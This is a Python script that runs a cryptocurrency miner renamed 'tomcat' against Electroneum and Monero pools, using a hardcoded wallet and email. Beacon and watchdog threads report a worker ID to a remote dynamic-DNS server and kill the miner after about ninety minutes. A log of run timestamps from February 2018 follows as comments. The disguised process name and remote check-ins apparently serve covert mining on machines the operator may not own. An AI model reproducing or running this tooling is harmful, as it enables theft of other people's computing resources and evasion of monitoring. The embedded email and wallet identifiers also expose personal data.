import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:19:07.080901
#2018-02-17 16:08:04.472242
#2018-02-17 17:57:01.383456
#2018-02-17 19:45:08.536130
#2018-02-17 21:32:05.504335
#2018-02-17 23:16:01.728496
#2018-02-18 01:02:06.928841
#2018-02-18 02:50:01.437033
#2018-02-18 04:39:02.039347
#2018-02-18 06:31:02.121011
#2018-02-18 08:19:01.488323
#2018-02-18 10:07:03.489027
#2018-02-18 11:53:03.531701
#2018-02-18 13:37:06.003780
#2018-02-18 15:27:07.257176
#2018-02-18 17:17:06.393939
#2018-02-18 19:06:07.001422
#2018-02-18 20:52:06.173210
#2018-02-18 22:37:03.531540
#2018-02-19 00:26:03.514015
#2018-02-19 02:11:03.479138
#2018-02-19 03:58:04.084242
#2018-02-19 05:42:07.818122
#2018-02-19 07:29:04.906419
#2018-02-19 09:20:07.392711
#2018-02-19 11:09:08.835855
#2018-02-19 12:57:10.493659
#2018-02-19 14:46:01.678545
#2018-02-19 16:34:05.602080
#2018-02-19 18:21:06.638322
#2018-02-19 20:07:03.844708
#2018-02-19 21:58:07.031956
#2018-02-19 23:43:06.539218
#2018-02-20 01:33:02.022710
#2018-02-20 03:21:01.611532
#2018-02-20 05:09:02.104277
#2018-02-20 06:52:07.294125
#2018-02-20 08:38:10.146510
#2018-02-20 10:22:05.435885
#2018-02-20 12:07:02.039589
#2018-02-20 13:53:05.991656
#2018-02-20 15:38:09.700853
#2018-02-20 17:22:08.920439
#2018-02-20 19:13:05.975540
#2018-02-20 21:01:08.962816
#2018-02-20 22:46:04.537881
#2018-02-21 00:31:08.943340
#2018-02-21 02:18:04.966849
#2018-02-21 04:07:04.830210
#2018-02-21 05:54:05.311696
#2018-02-21 07:42:06.184419
#2018-02-21 09:27:04.270536
#2018-02-21 11:16:04.333474
#2018-02-21 13:06:07.992511
#2018-02-21 14:53:09.959919
#2018-02-21 16:43:06.786486
#2018-02-21 18:34:09.115430
#2018-02-21 20:19:08.165964
#2018-02-21 22:08:01.430207
#2018-02-21 23:56:03.847067
#2018-02-22 01:44:02.267631
#2018-02-22 03:32:04.239314
#2018-02-22 05:20:05.647237
#2018-02-22 07:06:05.565677
#2018-02-22 08:54:07.824938
#2018-02-22 10:42:08.098373
#2018-02-22 12:30:12.632750
#2018-02-22 14:16:07.532962
#2018-02-22 16:04:01.268172
#2018-02-22 17:50:12.453987
#2018-02-22 19:36:07.129037
#2018-02-22 21:29:01.712921
#2018-02-22 23:15:07.831186
#2018-02-23 01:03:04.095274
#2018-02-23 02:51:07.630310
#2018-02-23 04:38:05.231559
#2018-02-23 06:24:02.028138
#2018-02-23 08:11:05.545383
#2018-02-23 10:28:04.716421
#2018-02-23 12:21:07.421991
#2018-02-23 14:10:09.349978
#2018-02-23 16:01:01.916419
#2018-02-23 17:47:05.595025
#2018-02-23 19:34:07.611780
#2018-02-23 21:17:01.682296
#2018-02-23 23:04:01.362301
#2018-02-24 00:50:01.540593
#2018-02-24 02:43:04.585546
#2018-02-24 04:37:04.214976
#2018-02-24 06:21:07.461194
#2018-02-24 08:09:04.205829
#2018-02-24 09:54:07.600865
#2018-02-24 11:49:01.745684
#2018-02-24 13:40:08.835300
#2018-02-24 15:27:03.924824
#2018-02-24 17:16:04.654065
#2018-02-24 19:07:06.888626
#2018-02-24 20:56:01.822228
#2018-02-24 23:22:06.703892
#2018-02-25 02:47:04.977004
#2018-02-25 06:34:06.404496